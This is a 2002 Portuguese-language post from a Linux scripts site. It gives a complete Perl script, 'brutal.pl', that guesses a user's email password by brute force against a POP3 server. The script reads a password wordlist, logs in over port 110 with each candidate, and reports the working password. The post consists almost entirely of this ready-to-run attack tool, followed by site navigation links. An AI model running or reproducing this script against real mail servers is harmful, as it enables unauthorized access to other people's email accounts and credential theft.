Brutal Force Attack
Publicado por Fábio Berbert de Paula 13/11/2002
[ Hits: 16.127 ]
Homepage: https://fabio.automatizando.dev
Tenta fazer a adivinhação da senha de um usuário de email através da técnica de invasão por força bruta, ou seja, tentativa e erro. O script utiliza o módulo IO::Socket para efetuar conexão com o servidor POP.
#!/usr/bin/perl ############################################# # brutal.pl # # Programa que simula um ataque brutal force # em servidores de email através da tentativa # de invasão por adivinhação de senha. # # Programado por: Fábio Berbert de Paula # E-mail: fabio@vivaolinux.com.br # Web Site: www.vivaolinux.com.br # # Rio de Janeiro, 12 de Agosto de 2002 # ########################################## use strict; use IO::Socket; if ($#ARGV != 2) { print "Use: \n\t$0 popserver username passwd_list\n\nOnde:\n"; print "\tpopserver = servidor de email\n\tusername = nome do usuário\n"; print "\tpasswd_list = arquivo com a lista de senhas que serão enviadas para teste\n\n"; exit(0); } my ($server,$user,$pwfile) = @ARGV; if (! -f $pwfile) { print "Erro: $pwfile não é um nome de arquivo válido!\n"; exit; } # para cada senha, tente invadir open(R,$pwfile); while (<R>) { chomp; tryout($server,$user,$_); } close(R); sub tryout { my ($server,$user,$passwd) = @_; my $state; print "Tentativa: $passwd ...\n"; my $connex = new IO::Socket::INET->new( PeerAddr => $server, PeerPort => "110", Proto => "tcp", Type => SOCK_STREAM, Timeout => "30" ); if (!defined($connex)) { print "Erro ao conectar ao servidor $server ...\n"; exit(0); } $state = &readsock($connex); $connex->send("USER $user\r\n"); $state = &readsock($connex); if ($state !~ /^\+OK/) { next; } $connex->send("PASS $passwd\r\n"); $state = &readsock($connex); if ($state =~ /^\+OK/) { print "Cracked!!! A senha do usuário $user é $passwd\n"; exit; } $connex -> close; sleep(5); } sub readsock { my ($socket) = @_; my $data = ''; my $buf = ''; while ($buf !~ /\n$/) { $buf=<$socket>; $data .= $buf; } return $data; }
Script para encontrar vulnerabilidades no BIND
Testando multiplos servers a ataque DoS
Compartilhando a tela do Computador no Celular via Deskreen
Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
Como renomear arquivos de letras maiúsculas para minúsculas
Imprimindo no formato livreto no Linux
Vim - incrementando números em substituição
Efeito "livro" em arquivos PDF
Como resolver o erro no CUPS: Unable to get list of printer drivers
Melhores Práticas de Nomenclatura: Pastas, Arquivos e Código (2)
Preciso resolver um erro de DPKG (0)
Não to conseguindo resolver este problemas ao instalar o playonelinux (1)
[Python] Automação de scan de vulnerabilidades
[Python] Script para analise de superficie de ataque
[Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem
[Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)
[Shell Script] Script para adicionar bordas às imagens de uma pasta